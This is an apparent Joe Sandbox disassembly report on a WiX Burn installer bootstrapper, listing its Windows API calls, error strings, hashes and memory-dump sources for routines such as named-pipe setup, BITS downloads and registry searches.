                                                                                                                                                                    • API String ID: 2348918689-2631711097
                                                                                                                                                                    • Opcode ID: e71c7ddda409882c65c6bb61fc01fcce9ec93b676825ae8267933943fdcfd9e7
                                                                                                                                                                    • Instruction ID: 4df6754fb90aa678343a2b77507b000ca0cdf714a29ecdbb951c629277665f11
                                                                                                                                                                    • Opcode Fuzzy Hash: e71c7ddda409882c65c6bb61fc01fcce9ec93b676825ae8267933943fdcfd9e7
                                                                                                                                                                    • Instruction Fuzzy Hash: CD51FF32D4022ABFCF319AA5CC2AFAEB668AB80765F114535FD00B65E0D7759E0497C0
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(74DE8FB0,00000002,00000000), ref: 0092CC9D
                                                                                                                                                                      • Part of subcall function 00914D8D: UuidCreate.RPCRT4(?), ref: 00914DC0
                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,00922401,?,?,00000000,?,?,?), ref: 0092CD7B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0092CD85
                                                                                                                                                                    • GetProcessId.KERNEL32(00922401,?,?,00000000,?,?,?,?), ref: 0092CDBD
                                                                                                                                                                      • Part of subcall function 009154DC: lstrlenW.KERNEL32(?,?,00000000,?,0094B500,?,00000000,?,0090452F,?,0094B500), ref: 009154FD
                                                                                                                                                                      • Part of subcall function 009154DC: GetCurrentProcessId.KERNEL32(?,0090452F,?,0094B500), ref: 00915508
                                                                                                                                                                      • Part of subcall function 009154DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0090452F,?,0094B500), ref: 0091553F
                                                                                                                                                                      • Part of subcall function 009154DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0090452F,?,0094B500), ref: 00915554
                                                                                                                                                                      • Part of subcall function 009154DC: GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091555E
                                                                                                                                                                      • Part of subcall function 009154DC: Sleep.KERNEL32(00000064,?,0090452F,?,0094B500), ref: 00915593
                                                                                                                                                                      • Part of subcall function 009154DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0090452F,?,0094B500), ref: 009155B6
                                                                                                                                                                      • Part of subcall function 009154DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 009155D1
                                                                                                                                                                      • Part of subcall function 009154DC: WriteFile.KERNEL32(?,0090452F,0094B500,00000000,00000000,?,0090452F,?,0094B500), ref: 009155EC
                                                                                                                                                                      • Part of subcall function 009154DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 00915607
                                                                                                                                                                      • Part of subcall function 00940A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00940A38
                                                                                                                                                                      • Part of subcall function 00940A28: GetLastError.KERNEL32(?,?,00904F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00940A46
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0092CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0092CE41
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0092CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0092CE50
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0092CBEF,?,?,?,?,?,00000000,?,?,?), ref: 0092CE67
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate embedded command., xrefs: 0092CD54
                                                                                                                                                                    • Failed to create embedded process at path: %ls, xrefs: 0092CDB3
                                                                                                                                                                    • Failed to create embedded pipe., xrefs: 0092CD27
                                                                                                                                                                    • %ls -%ls %ls %ls %u, xrefs: 0092CD40
                                                                                                                                                                    • Failed to process messages from embedded message., xrefs: 0092CE04
                                                                                                                                                                    • burn.embedded, xrefs: 0092CD38
                                                                                                                                                                    • Failed to wait for embedded process to connect to pipe., xrefs: 0092CDDF
                                                                                                                                                                    • embedded.cpp, xrefs: 0092CDA6
                                                                                                                                                                    • Failed to create embedded pipe name and client token., xrefs: 0092CD00
                                                                                                                                                                    • Failed to wait for embedded executable: %ls, xrefs: 0092CE24
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                                                    • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                                    • API String ID: 875070380-3803182736
                                                                                                                                                                    • Opcode ID: 722e21c9574d1af37c56e5403f34c8d135bfcd2c04a1eeee267c3fb3082a364f
                                                                                                                                                                    • Instruction ID: e7f70fe418cd59f91007bbc15fd4bb9ac10497ace8847d2183d401813bc0379a
                                                                                                                                                                    • Opcode Fuzzy Hash: 722e21c9574d1af37c56e5403f34c8d135bfcd2c04a1eeee267c3fb3082a364f
                                                                                                                                                                    • Instruction Fuzzy Hash: 14517FB2D4022DBBDF119BA4EC46FEEBBB8AF48711F110121FA04B6194D7749A409BD1
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090EE4C
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0090EE04
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                    • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
                                                                                                                                                                    • API String ID: 336948655-956346883
                                                                                                                                                                    • Opcode ID: 6ab9a0163f5cacbc915236aff9533e3dd0a95367f3958263fa4579b36a8cf742
                                                                                                                                                                    • Instruction ID: 956f323f4effc95c9e8a809b9bed43d598b96e393cc93a5fe7488dad50e14406
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ab9a0163f5cacbc915236aff9533e3dd0a95367f3958263fa4579b36a8cf742
                                                                                                                                                                    • Instruction Fuzzy Hash: 4D519231E0162AFFDB11DF65C885FAEB7A8BF40714B1049A9FD05AB290C771DE009790
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,00948468,00000001,?), ref: 00947F9E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,00948468,00000001,?), ref: 00947FB9
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,00948468,00000001,?), ref: 00947FD4
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,00948468,00000001,?), ref: 00948040
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,00948468,00000001,?), ref: 00948064
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,00948468,00000001,?), ref: 00948088
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,00948468,00000001,?), ref: 009480A8
                                                                                                                                                                    • lstrlenW.KERNEL32(006C0064,?,00948468,00000001,?), ref: 009480C3
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$lstrlen
                                                                                                                                                                    • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                                                                    • API String ID: 1657112622-2492263259
                                                                                                                                                                    • Opcode ID: c11f90b80bbf1a6b41521d9437e93ccde69e6d6c1dd9461f0e351290f92d32a7
                                                                                                                                                                    • Instruction ID: 2dcd2f671cb6c3c67ba74b08fa7af93888cfc17fb59ecc5daf4f14841e1f7eb6
                                                                                                                                                                    • Opcode Fuzzy Hash: c11f90b80bbf1a6b41521d9437e93ccde69e6d6c1dd9461f0e351290f92d32a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 8051B43165C612BBDB204F94CC45F6ABB66EB15B30F204715FA34AE2E1CBA5EC44D790
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A0B6
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16
                                                                                                                                                                    • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                    • API String ID: 3613110473-2134270738
                                                                                                                                                                    • Opcode ID: 9a02de9fa8f64272f2dae7469970e4be4fa493f942c3225c8240d469da717611
                                                                                                                                                                    • Instruction ID: ea7557b588c6c6cbb580afb9faeb5810031d67f0e16e9af74443eafc0a653a30
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a02de9fa8f64272f2dae7469970e4be4fa493f942c3225c8240d469da717611
                                                                                                                                                                    • Instruction Fuzzy Hash: C661E432D40318BFCB219AA8CD85EAE7BB8FB85714F204165F914BB2D1C236DE5097D2
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00914B84
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914B92
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00914BB6
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLastSleep
                                                                                                                                                                    • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 408151869-3212458075
                                                                                                                                                                    • Opcode ID: a7d1f883fa84d229d0aef9a0ca37775b7d927a871e94705382dbe47a36b96a1e
                                                                                                                                                                    • Instruction ID: f81f9b64f77a50d9dadb60c6b2185891542dce778f8dfd4a31b3c49f400bc121
                                                                                                                                                                    • Opcode Fuzzy Hash: a7d1f883fa84d229d0aef9a0ca37775b7d927a871e94705382dbe47a36b96a1e
                                                                                                                                                                    • Instruction Fuzzy Hash: 94416B36F8663ABBDB2157A08D06FDE7A68AF18725F110221FE10BB1D0D774DD8096D4
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,009104DF,InstallerVersion,InstallerVersion,00000000,009104DF,InstallerName,InstallerName,00000000,009104DF,Date,InstalledDate,00000000,009104DF,LogonUser), ref: 0090F733
                                                                                                                                                                      • Part of subcall function 009414F4: RegSetValueExW.ADVAPI32(00020006,00950D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0090F335,00000000,?,00020006), ref: 00941527
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseValue
                                                                                                                                                                    • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                                    • API String ID: 3132538880-2703781546
                                                                                                                                                                    • Opcode ID: 569549a8cdfe75165f35a7b4578259d6a330945831775448cf70478b89e2f5b8
                                                                                                                                                                    • Instruction ID: 44f846a290ed246890b483c3a635205b91a3983b3f989fdf63b6c4773a2a0ea6
                                                                                                                                                                    • Opcode Fuzzy Hash: 569549a8cdfe75165f35a7b4578259d6a330945831775448cf70478b89e2f5b8
                                                                                                                                                                    • Instruction Fuzzy Hash: D4410832A85669BFCF33D655CC12EAF7A29AB91B19F100170FD00B66E2C7719F14A781
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsSetValue.KERNEL32(?,?), ref: 0091E7FF
                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 0091E82B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E836
                                                                                                                                                                    • CreateWindowExW.USER32(00000080,00959E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0091E89D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E8A7
                                                                                                                                                                    • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0091E945
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                    • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                    • API String ID: 213125376-288575659
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0092CAAC
                                                                                                                                                                    • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0092C9B7
                                                                                                                                                                    • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0092C9C5
                                                                                                                                                                    • Failed to copy download source for passthrough pseudo bundle., xrefs: 0092C98F
                                                                                                                                                                    • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0092C9E7
                                                                                                                                                                    • Failed to copy related arguments for passthrough bundle package, xrefs: 0092CA82
                                                                                                                                                                    • pseudobundle.cpp, xrefs: 0092C7A8, 0092C9A1, 0092C9DB
                                                                                                                                                                    • Failed to copy filename for passthrough pseudo bundle., xrefs: 0092C9BE
                                                                                                                                                                    • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0092CA05
                                                                                                                                                                    • Failed to recreate command-line arguments., xrefs: 0092CA43
                                                                                                                                                                    • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0092C9AD
                                                                                                                                                                    • Failed to copy install arguments for passthrough bundle package, xrefs: 0092CA62
                                                                                                                                                                    • Failed to copy key for passthrough pseudo bundle., xrefs: 0092C988
                                                                                                                                                                    • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0092C7B4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                                    • API String ID: 1357844191-115096447
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0092DE61
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid BITS engine URL: %ls, xrefs: 0092DE83
                                                                                                                                                                    • bitsengine.cpp, xrefs: 0092DE77, 0092DF6A
                                                                                                                                                                    • Failed to download BITS job., xrefs: 0092DFF8
                                                                                                                                                                    • Failed to create BITS job., xrefs: 0092DEF0
                                                                                                                                                                    • Failed to set credentials for BITS job., xrefs: 0092DF0F
                                                                                                                                                                    • Failed to set callback interface for BITS job., xrefs: 0092DF99
                                                                                                                                                                    • Failed to add file to BITS job., xrefs: 0092DF2E
                                                                                                                                                                    • Failed while waiting for BITS download., xrefs: 0092E012
                                                                                                                                                                    • Falied to start BITS job., xrefs: 0092E019
                                                                                                                                                                    • Failed to copy download URL., xrefs: 0092DEA8
                                                                                                                                                                    • Failed to create BITS job callback., xrefs: 0092DF74
                                                                                                                                                                    • Failed to complete BITS job., xrefs: 0092E00B
                                                                                                                                                                    • Failed to initialize BITS job callback., xrefs: 0092DF82
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                    • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                                    • API String ID: 1659193697-2382896028
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090BCE5
                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0090BDF2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0090BDFC
                                                                                                                                                                    • WaitForInputIdle.USER32(?,?), ref: 0090BE50
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0090BE9B
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 0090BEA8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                                                                    • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                                                                                                                    • API String ID: 155678114-2737401750
                                                                                                                                                                    APIs
                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00926F28,?), ref: 00926A0B
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926A18
                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926A60
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926A6C
                                                                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926AA6
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00926F28,?,?,?), ref: 00926AB0
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00926B67
                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(?), ref: 00926B71
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                                                    • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                                    • API String ID: 971853308-301359130
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A2B3
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 0090A30E
                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0090A32F
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0090A405
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to query registry key value., xrefs: 0090A36A
                                                                                                                                                                    • Registry key not found. Key = '%ls', xrefs: 0090A396
                                                                                                                                                                    • Failed to format key string., xrefs: 0090A2BE
                                                                                                                                                                    • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0090A37A
                                                                                                                                                                    • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0090A3DD
                                                                                                                                                                    • Failed to format value string., xrefs: 0090A319
                                                                                                                                                                    • search.cpp, xrefs: 0090A360
                                                                                                                                                                    • Failed to set variable., xrefs: 0090A3BD
                                                                                                                                                                    • Failed to open registry key. Key = '%ls', xrefs: 0090A3C7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Open@16$CloseQueryValue
                                                                                                                                                                    • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0090BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B210
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090BAFB,00000008,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 0090B21C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleLastModule
                                                                                                                                                                    • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0090699B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009069A5
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 009069E8
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009069F2
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00906B03
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                                    APIs
                                                                                                                                                                    • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00905466,?,?,?,?), ref: 00904920
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00905466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00904931
